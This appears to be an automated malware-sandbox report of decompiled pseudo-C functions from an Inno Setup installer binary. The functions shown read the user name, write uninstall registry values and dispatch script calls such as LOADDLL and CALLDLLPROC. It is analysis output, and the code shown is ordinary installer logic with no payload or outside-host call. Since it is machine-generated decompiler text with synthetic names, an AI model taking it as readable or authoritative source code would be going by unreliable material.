Function 00423B6C Relevance: 1.5, APIs: 1, Instructions: 24
nativeCOMMON

Download Yara Rule

C-Code - Quality: 37%

			E00423B6C(intOrPtr _a4) {
				intOrPtr _t26;

				_push( *((intOrPtr*)( *((intOrPtr*)(_a4 - 8)) + 8)));
				_push( *((intOrPtr*)( *((intOrPtr*)(_a4 - 8)) + 4)));
				_push( *((intOrPtr*)( *((intOrPtr*)(_a4 - 8)))));
				_t26 =  *((intOrPtr*)( *((intOrPtr*)(_a4 - 4)) + 0x20));
				_push(_t26); // executed
				L00405E1C(); // executed
				 *((intOrPtr*)( *((intOrPtr*)(_a4 - 8)) + 0xc)) = _t26;
				return _t26;
			}

0x00423b78
0x00423b82
0x00423b8b
0x00423b92
0x00423b95
0x00423b96
0x00423ba1
0x00423ba5

APIs

NtdllDefWindowProc_A.USER32(?,?,?,?,?,00424139,?,00000000,00424144), ref: 00423B96

Memory Dump Source

Source File: 00000001.00000002.324242235.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.324237646.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324312936.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324318502.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324323450.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324329962.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: NtdllProc_Window
String ID:
API String ID: 4255912815-0
Opcode ID: 14b87a452627f16e960b33ebbefb468ca8b3524091d2b1e585c0be6c597e0429
Instruction ID: 62037174fb3a4e63d39f4d80a9d1e591ad15120c94b51c82d4663250cb3dbf53
Opcode Fuzzy Hash: 14b87a452627f16e960b33ebbefb468ca8b3524091d2b1e585c0be6c597e0429
Instruction Fuzzy Hash: A0F0C579205608AFCB40DF9DC588D4AFBE8FB4C260B158295B988CB321C234FE808F94

Uniqueness

Uniqueness Score: -1.00%

Function 004547B8 Relevance: 1.5, APIs: 1, Instructions: 20
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E004547B8(void* __eax) {
				char _v264;
				int _t5;
				void* _t10;
				DWORD* _t13;

				_t13 =  &_v264;
				_t10 = __eax;
				 *_t13 = 0x101;
				_t5 = GetUserNameA( &_v264, _t13); // executed
				if(_t5 == 0) {
					return E00403400(_t10);
				}
				return E0040355C(_t10, 0x101,  &_v264);
			}

0x004547b9
0x004547bf
0x004547c1
0x004547ce
0x004547d5
0x00000000
0x004547eb
0x00000000

APIs

GetUserNameA.ADVAPI32(?), ref: 004547CE

Memory Dump Source

Source File: 00000001.00000002.324242235.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.324237646.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324312936.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324318502.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324323450.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324329962.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: NameUser
String ID:
API String ID: 2645101109-0
Opcode ID: 80bf5ddaf148eaaef6fc889b5fbec2eb268055f7665b9268d68cbe33f7328bb0
Instruction ID: 3c23b56c855bc6d7d86c737aef60ab85cedc27dd6e4fc0ee06301d897b8feba6
Opcode Fuzzy Hash: 80bf5ddaf148eaaef6fc889b5fbec2eb268055f7665b9268d68cbe33f7328bb0
Instruction Fuzzy Hash: 87D01D7570420067D700AA699C82596758D4784315F00453F7CC5DA3C3E6BDD6985656

Uniqueness

Uniqueness Score: -1.00%

Function 0042F178 Relevance: 1.5, APIs: 1, Instructions: 17
nativeCOMMON

Download Yara Rule

C-Code - Quality: 50%

			E0042F178(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				intOrPtr _t5;
				intOrPtr _t6;

				_t5 = _a8;
				if(_t5 != 0x10) {
					_push(_a16);
					_push(_a12);
					_push(_t5);
					_t6 = _a4;
					_push(_t6); // executed
					L00405E1C(); // executed
					return _t6;
				}
				return 0;
			}

0x0042f17b
0x0042f181
0x0042f18a
0x0042f18e
0x0042f18f
0x0042f190
0x0042f193
0x0042f194
0x00000000
0x0042f194
0x00000000

APIs

NtdllDefWindowProc_A.USER32(?,?,?,?), ref: 0042F194

Memory Dump Source

Source File: 00000001.00000002.324242235.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.324237646.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324312936.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324318502.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324323450.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324329962.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: NtdllProc_Window
String ID:
API String ID: 4255912815-0
Opcode ID: 7a5fa4d7d2329fa01ca55977667307e26d278e108d61fe7d10643c626aa98b45
Instruction ID: f5cb62dd4479e9cc6ef3c843e292de59d81b4739e20d4e06d93fad05e466a6e5
Opcode Fuzzy Hash: 7a5fa4d7d2329fa01ca55977667307e26d278e108d61fe7d10643c626aa98b45
Instruction Fuzzy Hash: 81D09EB125010DABDB00DE99E840C6B33ADAB88710BE08926F559C7245D634ED6197A9

Uniqueness

Uniqueness Score: -1.00%

Function 0046DCF8 Relevance: 72.2, APIs: 1, Strings: 40, Instructions: 480
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 79%

			E0046DCF8(void* __eax, void* __ebx, intOrPtr* __edx, void* __edi, void* __esi, void* __fp0) {
				intOrPtr _v8;
				char _v12;
				void* _v16;
				char _v20;
				char _v24;
				char _v28;
				intOrPtr _v32;
				char _v36;
				char _v40;
				char _v44;
				char _v48;
				void* _t155;
				intOrPtr _t156;
				void* _t160;
				intOrPtr _t161;
				void* _t162;
				intOrPtr _t180;
				long _t263;
				intOrPtr _t266;
				intOrPtr _t279;
				intOrPtr _t280;
				intOrPtr _t283;
				void* _t284;
				intOrPtr _t301;
				intOrPtr _t305;
				intOrPtr* _t309;
				intOrPtr _t312;
				intOrPtr _t316;
				void* _t327;
				intOrPtr _t328;
				intOrPtr* _t332;
				intOrPtr _t342;
				void* _t347;
				void* _t350;
				void* _t356;
				void* _t358;
				void* _t360;
				void* _t362;
				void* _t364;
				void* _t366;
				void* _t368;
				void* _t370;
				void* _t372;
				void* _t374;
				void* _t380;
				intOrPtr _t396;
				intOrPtr _t398;
				intOrPtr _t400;
				intOrPtr _t426;
				intOrPtr _t428;
				intOrPtr _t434;
				intOrPtr _t438;
				intOrPtr _t465;
				intOrPtr _t467;
				intOrPtr _t491;
				void* _t495;
				void* _t496;
				intOrPtr* _t498;
				void* _t500;
				void* _t501;
				void* _t503;
				void* _t504;
				intOrPtr _t505;
				void* _t528;

				_t528 = __fp0;
				_t503 = _t504;
				_t505 = _t504 + 0xffffffd0;
				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_v40 = 0;
				_v12 = 0;
				_v20 = 0;
				_t498 = __edx;
				_t495 = __eax;
				_push(_t503);
				_push(0x46e3a4);
				_push( *[fs:eax]);
				 *[fs:eax] = _t505;
				if( *0x49b372 == 0 ||  *0x0049B28E == 3 &&  *0x49b36f != 0) {
					_v8 = 0x80000001;
				} else {
					_v8 = 0x80000002;
				}
				_push("Software\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\");
				_push(_t495);
				_push("_is1");
				E00403634();
				_t155 = E00403738(_v12);
				_t156 =  *0x498c3c; // 0x1, executed
				E0042DDC0(_t156, 0x49b16c, _t155, 0x80000001, _t495, _t498); // executed
				if( *0x49b372 != 0) {
					_t327 = E00403738(_v12);
					_t328 =  *0x498c3c; // 0x1, executed
					E0042DDC0(_t328, 0x49b16c, _t327, 0x80000002, _t495, _t498); // executed
				}
				_t160 = E00403738(_v12);
				_t161 =  *0x498c3c; // 0x1, executed
				_t162 = E0042DCE4(_t161, _t160, _v8, 0,  &_v16, 0, 2, 0, 0, 0); // executed
				_t510 = _t162;
				if(_t162 != 0) {
					E0046D9C8(1, 0x49b16c, _v12, _v8, _t495, _t498, _t510, _t162);
				}
				_push(_t503);
				_push(0x46e352);
				_push( *[fs:eax]);
				 *[fs:eax] = _t505;
				E0046DAE4(_v16, "5.3.11 (a)", "Inno Setup: Setup Version", _t503); // executed
				if(( *0x0049B29A & 0x00000002) == 0) {
					E00403400( &_v20);
				} else {
					_t491 =  *0x49b344; // 0x2286d78
					E00403494( &_v20, _t491);
				}
				E0046DAE4(_v16, _v20, "Inno Setup: App Path", _t503); // executed
				E0042C3E4(_v20,  &_v40);
				E0046DB2C(_v16, _v40, "InstallLocation", _t503); // executed
				_t342 =  *0x49b348; // 0x2297c20
				E0046DAE4(_v16, _t342, "Inno Setup: Icon Group", _t503); // executed
				if( *0x49b34c != 0) {
					E0046DB54(_v16, "Inno Setup: No Icons", _t503);
				}
				E004547B8( &_v40);
				E0046DAE4(_v16, _v40, "Inno Setup: User", _t503); // executed
				if( *0x49b350 != 0) {
					_t309 =  *0x49b350; // 0x0
					E0046DAE4(_v16,  *_t309, "Inno Setup: Setup Type", _t503);
					_t312 =  *0x49b354; // 0x2267910
					E004780DC(_t312, 0x49b16c,  &_v40, _t495, _t498);
					E0046DAE4(_v16, _v40, "Inno Setup: Selected Components", _t503);
					_t316 =  *0x49b358; // 0x226793c
					E004780DC(_t316, 0x49b16c,  &_v40, _t495, _t498);
					E0046DAE4(_v16, _v40, "Inno Setup: Deselected Components", _t503);
				}
				if( *0x49b37f != 0) {
					_t301 =  *0x49b35c; // 0x2267968
					E004780DC(_t301, 0x49b16c,  &_v40, _t495, _t498);
					E0046DAE4(_v16, _v40, "Inno Setup: Selected Tasks", _t503);
					_t305 =  *0x49b360; // 0x2267994
					E004780DC(_t305, 0x49b16c,  &_v40, _t495, _t498);
					E0046DAE4(_v16, _v40, "Inno Setup: Deselected Tasks", _t503);
				}
				if(( *0x0049B29D & 0x00000010) != 0) {
					_t396 =  *0x49b338; // 0x0
					E0046DAE4(_v16, _t396, "Inno Setup: User Info: Name", _t503);
					_t398 =  *0x49b33c; // 0x0
					E0046DAE4(_v16, _t398, "Inno Setup: User Info: Organization", _t503);
					_t400 =  *0x49b340; // 0x0
					E0046DAE4(_v16, _t400, "Inno Setup: User Info: Serial", _t503);
				}
				_t426 =  *0x498c38; // 0x0
				_t180 =  *0x49b2e4; // 0x22679c0
				E0046DAE4(_v16,  *((intOrPtr*)(E0040B424(_t180, _t426))), "Inno Setup: Language", _t503); // executed
				_pop(_t347);
				if( *0x0049B1A4 == 0) {
					_t428 =  *0x49b3a0; // 0x2278c44
					E00403494( &_v20, _t428);
				} else {
					E0047AA00( *((intOrPtr*)(0x49b1a4)), _t347,  &_v20);
				}
				E00403778(_v20, 0x3f, 1,  &_v40);
				E0046DAE4(_v16, _v40, "DisplayName", _t503); // executed
				_pop(_t350);
				E0047AA00( *0x0049B1A8, _t350,  &_v40);
				E0046DB2C(_v16, _v40, "DisplayIcon", _t503); // executed
				E00403494( &_v40, 0x46e5d0);
				_t434 =  *0x49b150; // 0x22a8b30
				E0040357C( &_v40, _t434);
				E0040357C( &_v40, 0x46e5d0);
				E0046DAE4(_v16, _v40, "UninstallString", _t503); // executed
				E00403494( &_v40, 0x46e5d0);
				_t438 =  *0x49b150; // 0x22a8b30
				E0040357C( &_v40, _t438);
				E0040357C( &_v40, "\" /SILENT");
				E0046DAE4(_v16, _v40, "QuietUninstallString", _t503); // executed
				_pop(_t356);
				E0047AA00( *0x0049B190, _t356,  &_v40);
				E0046DB2C(_v16, _v40, "DisplayVersion", _t503);
				_pop(_t358);
				E0047AA00( *0x0049B17C, _t358,  &_v40);
				E0046DB2C(_v16, _v40, "Publisher", _t503); // executed
				_pop(_t360);
				E0047AA00( *0x0049B180, _t360,  &_v40);
				E0046DB2C(_v16, _v40, "URLInfoAbout", _t503); // executed
				_pop(_t362);
				E0047AA00( *0x0049B184, _t362,  &_v40);
				E0046DB2C(_v16, _v40, "HelpTelephone", _t503);
				_pop(_t364);
				E0047AA00( *0x0049B188, _t364,  &_v40);
				E0046DB2C(_v16, _v40, "HelpLink", _t503); // executed
				_pop(_t366);
				E0047AA00( *0x0049B18C, _t366,  &_v40);
				E0046DB2C(_v16, _v40, "URLUpdateInfo", _t503); // executed
				_pop(_t368);
				E0047AA00( *0x0049B1BC, _t368,  &_v40);
				E0046DB2C(_v16, _v40, "Readme", _t503);
				_pop(_t370);
				E0047AA00( *0x0049B1C0, _t370,  &_v40);
				E0046DB2C(_v16, _v40, "Contact", _t503);
				_pop(_t372);
				E0047AA00( *0x0049B1C4, _t372,  &_v40);
				E0046DB2C(_v16, _v40, "Comments", _t503);
				_pop(_t374);
				E0047AA00( *0x0049B1C8, _t374,  &_v20);
				if(_v20 == 0) {
					E0046DB54(_v16, "NoModify", _t503); // executed
				} else {
					E0046DAE4(_v16, _v20, "ModifyPath", _t503);
				}
				E0046DB54(_v16, "NoRepair", _t503); // executed
				E0046DB88( &_v40);
				E0046DAE4(_v16, _v40, "InstallDate", _t503); // executed
				_pop(_t380);
				E0047AA00( *((intOrPtr*)(0x49b190)), _t380,  &_v40);
				if(E0046DBEC(_v40, 0x49b16c,  &_v28,  &_v24, _t495, _t498) != 0) {
					E0046DB54(_v16, "MajorVersion", _t503);
					E0046DB54(_v16, "MinorVersion", _t503);
				}
				if( *0x49b380 < 0x6010000) {
					L39:
					_t526 =  *0x49b3b8;
					if( *0x49b3b8 != 0) {
						_push(_t503);
						_push(0x46e31b);
						_push( *[fs:eax]);
						 *[fs:eax] = _t505;
						_v48 = _v16;
						_v44 = 0;
						_t266 =  *0x49b3b8; // 0x22901cc
						E00492F08(_t266,  &_v48, "RegisterPreviousData", _t526, _t528, 0, 0);
						_pop(_t467);
						 *[fs:eax] = _t467;
					}
					_pop(_t465);
					 *[fs:eax] = _t465;
					_push(0x46e359);
					_t263 = RegCloseKey(_v16); // executed
					return _t263;
				} else {
					_t520 =  *0x0049B296;
					if( *0x0049B296 != 0) {
						_v36 =  *((intOrPtr*)(0x49b296));
						__eflags = 0;
						_v32 = 0;
						L37:
						if(_v32 == 0) {
							E00430860( &_v36, 0x400);
							E0046DB54(_v16, "EstimatedSize", _t503); // executed
						}
						goto L39;
					}
					_v36 =  *_t498;
					_v32 =  *((intOrPtr*)(_t498 + 4));
					E00430824( &_v36, 0x49b280, _t520);
					_t279 =  *0x49b2f4; // 0x2267a10
					_t500 =  *((intOrPtr*)(_t279 + 8)) - 1;
					if(_t500 < 0) {
						goto L37;
					}
					_t501 = _t500 + 1;
					_t496 = 0;
					do {
						_t280 =  *0x49b2f4; // 0x2267a10
						_t332 = E0040B424(_t280, _t496);
						_t283 =  *0x49b354; // 0x2267910
						_t284 = E00477D50(_t283,  *_t332, 0, 0,  *((intOrPtr*)(_t332 + 0xc)), 0);
						_t523 = _t284;
						if(_t284 != 0) {
							_t137 = _t332 + 0x14; // 0x14
							E00430824( &_v36, _t137, _t523);
						}
						_t496 = _t496 + 1;
						_t501 = _t501 - 1;
					} while (_t501 != 0);
					goto L37;
				}
			}

0x0046dcf8
0x0046dcf9
0x0046dcfb
0x0046dcfe
0x0046dcff
0x0046dd00
0x0046dd03
0x0046dd06
0x0046dd09
0x0046dd0c
0x0046dd0e
0x0046dd17
0x0046dd18
0x0046dd1d
0x0046dd20
0x0046dd2a
0x0046dd47
0x0046dd3e
0x0046dd3e
0x0046dd3e
0x0046dd4e
0x0046dd53
0x0046dd54
0x0046dd61
0x0046dd69
0x0046dd75
0x0046dd7a
0x0046dd86
0x0046dd8b
0x0046dd97
0x0046dd9c
0x0046dd9c
0x0046ddb4
0x0046ddbe
0x0046ddc3
0x0046ddc8
0x0046ddca
0x0046ddd5
0x0046ddd5
0x0046dddc
0x0046dddd
0x0046dde2
0x0046dde5
0x0046ddf6
0x0046de03
0x0046de18
0x0046de05
0x0046de08
0x0046de0e
0x0046de0e
0x0046de29
0x0046de36
0x0046de46
0x0046de52
0x0046de5b
0x0046de68
0x0046de78
0x0046de7d
0x0046de82
0x0046de92
0x0046de9f
0x0046dea2
0x0046deb1
0x0046debb
0x0046dec0
0x0046ded0
0x0046deda
0x0046dedf
0x0046deef
0x0046def4
0x0046defc
0x0046df02
0x0046df07
0x0046df17
0x0046df21
0x0046df26
0x0046df36
0x0046df3b
0x0046df43
0x0046df4b
0x0046df54
0x0046df60
0x0046df69
0x0046df75
0x0046df7e
0x0046df83
0x0046df85
0x0046df8b
0x0046df9f
0x0046dfa4
0x0046dfa9
0x0046dfbb
0x0046dfc1
0x0046dfab
0x0046dfb1
0x0046dfb1
0x0046dfd8
0x0046dfe8
0x0046dfed
0x0046dff5
0x0046e005
0x0046e014
0x0046e01c
0x0046e022
0x0046e02f
0x0046e03f
0x0046e04e
0x0046e056
0x0046e05c
0x0046e069
0x0046e079
0x0046e07e
0x0046e086
0x0046e096
0x0046e09b
0x0046e0a3
0x0046e0b3
0x0046e0b8
0x0046e0c0
0x0046e0d0
0x0046e0d5
0x0046e0dd
0x0046e0ed
0x0046e0f2
0x0046e0fa
0x0046e10a
0x0046e10f
0x0046e117
0x0046e127
0x0046e12c
0x0046e134
0x0046e144
0x0046e149
0x0046e151
0x0046e161
0x0046e166
0x0046e16e
0x0046e17e
0x0046e183
0x0046e18a
0x0046e193
0x0046e1b7
0x0046e195
0x0046e1a1
0x0046e1a6
0x0046e1cb
0x0046e1d5
0x0046e1e5
0x0046e1ea
0x0046e1f1
0x0046e206
0x0046e214
0x0046e226
0x0046e22b
0x0046e236
0x0046e2da
0x0046e2da
0x0046e2e1
0x0046e2e5
0x0046e2e6
0x0046e2eb
0x0046e2ee
0x0046e2f8
0x0046e2fb
0x0046e307
0x0046e30c
0x0046e313
0x0046e316
0x0046e316
0x0046e33d
0x0046e340
0x0046e343
0x0046e34c
0x0046e351
0x0046e23c
0x0046e23c
0x0046e243
0x0046e2ad
0x0046e2b0
0x0046e2b2
0x0046e2b5
0x0046e2b9
0x0046e2c3
0x0046e2d4
0x0046e2d9
0x00000000
0x0046e2b9
0x0046e247
0x0046e24d
0x0046e259
0x0046e25e
0x0046e266
0x0046e269
0x00000000
0x00000000
0x0046e26b
0x0046e26c
0x0046e26e
0x0046e270
0x0046e27a
0x0046e288
0x0046e28d
0x0046e292
0x0046e294
0x0046e296
0x0046e29c
0x0046e29c
0x0046e2a1
0x0046e2a2
0x0046e2a2
0x00000000
0x0046e2a5

APIs

Part of subcall function 0046DAE4: RegSetValueExA.ADVAPI32(?,Inno Setup: Setup Version,00000000,00000001,00000000,00000001,?,CLG,0049B16C,?,0046DDFB,?,00000000,0046E352,?,_is1), ref: 0046DB07

RegCloseKey.ADVAPI32(?,0046E359,?,_is1,?,Software\Microsoft\Windows\CurrentVersion\Uninstall\,00000000,0046E3A4,?,?,0049B16C,00000000), ref: 0046E34C

Strings

UninstallString, xrefs: 0046E037
DisplayIcon, xrefs: 0046DFFD
HelpTelephone, xrefs: 0046E0E5
Inno Setup: Deselected Tasks, xrefs: 0046DF2E
Inno Setup: No Icons, xrefs: 0046DE6B
QuietUninstallString, xrefs: 0046E071
Inno Setup: App Path, xrefs: 0046DE1E
Inno Setup: User, xrefs: 0046DE8A
InstallLocation, xrefs: 0046DE3E
Inno Setup: Deselected Components, xrefs: 0046DEE7
Inno Setup: Icon Group, xrefs: 0046DE4D
Contact, xrefs: 0046E159
DisplayName, xrefs: 0046DFE0
DisplayVersion, xrefs: 0046E08E
Comments, xrefs: 0046E176
MinorVersion, xrefs: 0046E21B
Readme, xrefs: 0046E13C
URLInfoAbout, xrefs: 0046E0C8
Inno Setup: Selected Components, xrefs: 0046DEC8
Inno Setup: Setup Type, xrefs: 0046DEA9
EstimatedSize, xrefs: 0046E2C9
Inno Setup: User Info: Serial, xrefs: 0046DF70
ModifyPath, xrefs: 0046E196
RegisterPreviousData, xrefs: 0046E302
NoRepair, xrefs: 0046E1BE
Software\Microsoft\Windows\CurrentVersion\Uninstall\, xrefs: 0046DD4E
Inno Setup: Language, xrefs: 0046DF97
NoModify, xrefs: 0046E1AA
Inno Setup: User Info: Organization, xrefs: 0046DF5B
MajorVersion, xrefs: 0046E209
HelpLink, xrefs: 0046E102
Inno Setup: Setup Version, xrefs: 0046DDE9
Inno Setup: User Info: Name, xrefs: 0046DF46
InstallDate, xrefs: 0046E1DD
Publisher, xrefs: 0046E0AB
URLUpdateInfo, xrefs: 0046E11F
" /SILENT, xrefs: 0046E064
5.3.11 (a), xrefs: 0046DDEE
_is1, xrefs: 0046DD54
Inno Setup: Selected Tasks, xrefs: 0046DF0F

Memory Dump Source

Source File: 00000001.00000002.324242235.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.324237646.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324312936.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324318502.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324323450.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324329962.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: CloseValue
String ID: " /SILENT$5.3.11 (a)$Comments$Contact$DisplayIcon$DisplayName$DisplayVersion$EstimatedSize$HelpLink$HelpTelephone$Inno Setup: App Path$Inno Setup: Deselected Components$Inno Setup: Deselected Tasks$Inno Setup: Icon Group$Inno Setup: Language$Inno Setup: No Icons$Inno Setup: Selected Components$Inno Setup: Selected Tasks$Inno Setup: Setup Type$Inno Setup: Setup Version$Inno Setup: User$Inno Setup: User Info: Name$Inno Setup: User Info: Organization$Inno Setup: User Info: Serial$InstallDate$InstallLocation$MajorVersion$MinorVersion$ModifyPath$NoModify$NoRepair$Publisher$QuietUninstallString$Readme$RegisterPreviousData$Software\Microsoft\Windows\CurrentVersion\Uninstall\$URLInfoAbout$URLUpdateInfo$UninstallString$_is1
API String ID: 3132538880-3404088248
Opcode ID: 6b0b379342b0fca0d2bfe09403e6ec56602a355d06f2cf6ed6d7a1d08da4ab7f
Instruction ID: 1a8995928857b61d5b707f5e71a78f763695e8feb1bd7aed965315b889cd918b
Opcode Fuzzy Hash: 6b0b379342b0fca0d2bfe09403e6ec56602a355d06f2cf6ed6d7a1d08da4ab7f
Instruction Fuzzy Hash: 78123234E001089FDB04DB96E981ADE73F9EB48304F60857BE8056B395FB79AD41CB5A

Uniqueness

Uniqueness Score: -1.00%

Function 00490A54 Relevance: 56.4, APIs: 16, Strings: 16, Instructions: 431
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 83%

			E00490A54(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __fp0, intOrPtr _a4) {
				char _v5;
				char _v12;
				char _v16;
				long _t81;
				long _t90;
				signed int _t103;
				CHAR* _t109;
				long _t128;
				long _t136;
				int _t138;
				signed int _t141;
				long _t145;
				int _t147;
				signed int _t150;
				long _t154;
				int _t156;
				long _t170;
				int _t172;
				int _t174;
				signed int _t177;
				long _t181;
				int _t183;
				int _t185;
				signed int _t188;
				long _t192;
				int _t194;
				int _t196;
				struct HWND__* _t206;
				void* _t220;
				intOrPtr _t276;
				intOrPtr* _t368;
				intOrPtr* _t369;
				void* _t372;
				intOrPtr _t375;

				_t378 = __fp0;
				_t220 = __ecx;
				_t374 = _t375;
				_push(0);
				_push(0);
				_push(0);
				_push(__ebx);
				_t219 = _a4;
				_push(_t375);
				_push(0x490f49);
				_push( *[fs:eax]);
				 *[fs:eax] = _t375;
				_t372 =  *((intOrPtr*)(_a4 + 0xc)) - 1;
				_v5 = 1;
				E00403684( *((intOrPtr*)(__edx + 0x10)), 0x490f64);
				if(_t372 != 0) {
					E00403684( *((intOrPtr*)(__edx + 0x10)), "FINDWINDOWBYCLASSNAME");
					if(__eflags != 0) {
						E00403684( *((intOrPtr*)(__edx + 0x10)), "FINDWINDOWBYWINDOWNAME");
						if(__eflags != 0) {
							E00403684( *((intOrPtr*)(__edx + 0x10)), "SENDMESSAGE");
							if(__eflags != 0) {
								E00403684( *((intOrPtr*)(__edx + 0x10)), "POSTMESSAGE");
								if(__eflags != 0) {
									E00403684( *((intOrPtr*)(__edx + 0x10)), "SENDNOTIFYMESSAGE");
									if(__eflags != 0) {
										E00403684( *((intOrPtr*)(__edx + 0x10)), "REGISTERWINDOWMESSAGE");
										if(__eflags != 0) {
											E00403684( *((intOrPtr*)(__edx + 0x10)), "SENDBROADCASTMESSAGE");
											if(__eflags != 0) {
												E00403684( *((intOrPtr*)(__edx + 0x10)), "POSTBROADCASTMESSAGE");
												if(__eflags != 0) {
													E00403684( *((intOrPtr*)(__edx + 0x10)), "SENDBROADCASTNOTIFYMESSAGE");
													if(__eflags != 0) {
														E00403684( *((intOrPtr*)(__edx + 0x10)), "LOADDLL");
														if(__eflags != 0) {
															E00403684( *((intOrPtr*)(__edx + 0x10)), "CALLDLLPROC");
															if(__eflags != 0) {
																E00403684( *((intOrPtr*)(__edx + 0x10)), "FREEDLL");
																if(__eflags != 0) {
																	E00403684( *((intOrPtr*)(__edx + 0x10)), "CREATEMUTEX");
																	if(__eflags != 0) {
																		E00403684( *((intOrPtr*)(__edx + 0x10)), "OEMTOCHARBUFF");
																		if(__eflags != 0) {
																			E00403684( *((intOrPtr*)(__edx + 0x10)), "CHARTOOEMBUFF");
																			if(__eflags != 0) {
																				_v5 = 0;
																			} else {
																				E0048AC40(_t219,  &_v12, _t372);
																				_t81 = E00403574(_v12);
																				CharToOemBuffA(E00403738(_v12), _t83, _t81);
																				E0048AC58();
																			}
																		} else {
																			E0048AC40(_t219,  &_v12, _t372);
																			_t90 = E00403574(_v12);
																			OemToCharBuffA(E00403738(_v12), _t92, _t90);
																			E0048AC58();
																		}
																	} else {
																		E00446630(_t219,  &_v16, _t372, __edx);
																		CreateMutexA(0, 0, E00403738(_v16));
																	}
																} else {
																	_t103 = FreeLibrary(E004465D4(_t219, _t220, _t372 - 1, __fp0));
																	asm("sbb ecx, ecx");
																	E00446708(_t219,  ~( ~_t103), _t372, _t374, __fp0);
																}
															} else {
																E00446630(_t219,  &_v16, _t372 - 2, __edx);
																_t109 = E00403738(_v16);
																_t368 = GetProcAddress(E004465D4(_t219,  &_v16, _t372 - 1, __fp0), _t109);
																__eflags = _t368;
																if(_t368 == 0) {
																	E00446708(_t219, 0, _t372, _t374, __fp0);
																} else {
																	E004468B0(_t219,  *_t368(E004465D4(_t219,  &_v16, _t372 - 3, __fp0), E004465D4(_t219,  &_v16, _t372 - 4, __fp0)), _t372 - 5, _t374, __fp0);
																	E00446708(_t219, 1, _t372, _t374, __fp0);
																}
															}
														} else {
															E00446630(_t219,  &_v16, _t372 - 1, __edx);
															_t369 = E0042E294(_v16, _t219, 0x8000);
															__eflags = _t369;
															if(_t369 == 0) {
																_t128 = GetLastError();
																__eflags = _t372 - 2;
																E004468B0(_t219, _t128, _t372 - 2, _t374, __fp0);
															} else {
																E004468B0(_t219, 0, _t372 - 2, _t374, __fp0);
															}
															E004468B0(_t219, _t369, _t372, _t374, _t378);
														}
													} else {
														_t136 = E004465D4(_t219, _t220, _t372 - 3, __fp0);
														_t138 = E004465D4(_t219, _t220, _t372 - 2, __fp0);
														_t141 = SendNotifyMessageA(0xffff, E004465D4(_t219, _t220, _t372 - 1, __fp0), _t138, _t136);
														asm("sbb ecx, ecx");
														E00446708(_t219,  ~( ~_t141), _t372, _t374, __fp0);
													}
												} else {
													_t145 = E004465D4(_t219, _t220, _t372 - 3, __fp0);
													_t147 = E004465D4(_t219, _t220, _t372 - 2, __fp0);
													_t150 = PostMessageA(0xffff, E004465D4(_t219, _t220, _t372 - 1, __fp0), _t147, _t145);
													asm("sbb ecx, ecx");
													E00446708(_t219,  ~( ~_t150), _t372, _t374, __fp0);
												}
											} else {
												_t154 = E004465D4(_t219, _t220, _t372 - 3, __fp0);
												_t156 = E004465D4(_t219, _t220, _t372 - 2, __fp0);
												E004468B0(_t219, SendMessageA(0xffff, E004465D4(_t219, _t220, _t372 - 1, __fp0), _t156, _t154), _t372, _t374, __fp0);
											}
										} else {
											E00446630(_t219,  &_v16, _t372 - 1, __edx);
											E004468B0(_t219, RegisterClipboardFormatA(E00403738(_v16)), _t372, _t374, __fp0);
										}
									} else {
										_t170 = E004465D4(_t219, _t220, _t372 - 4, __fp0);
										_t172 = E004465D4(_t219, _t220, _t372 - 3, __fp0);
										_t174 = E004465D4(_t219, _t220, _t372 - 2, __fp0);
										_t177 = SendNotifyMessageA(E004465D4(_t219, _t220, _t372 - 1, __fp0), _t174, _t172, _t170);
										asm("sbb ecx, ecx");
										E00446708(_t219,  ~( ~_t177), _t372, _t374, __fp0);
									}
								} else {
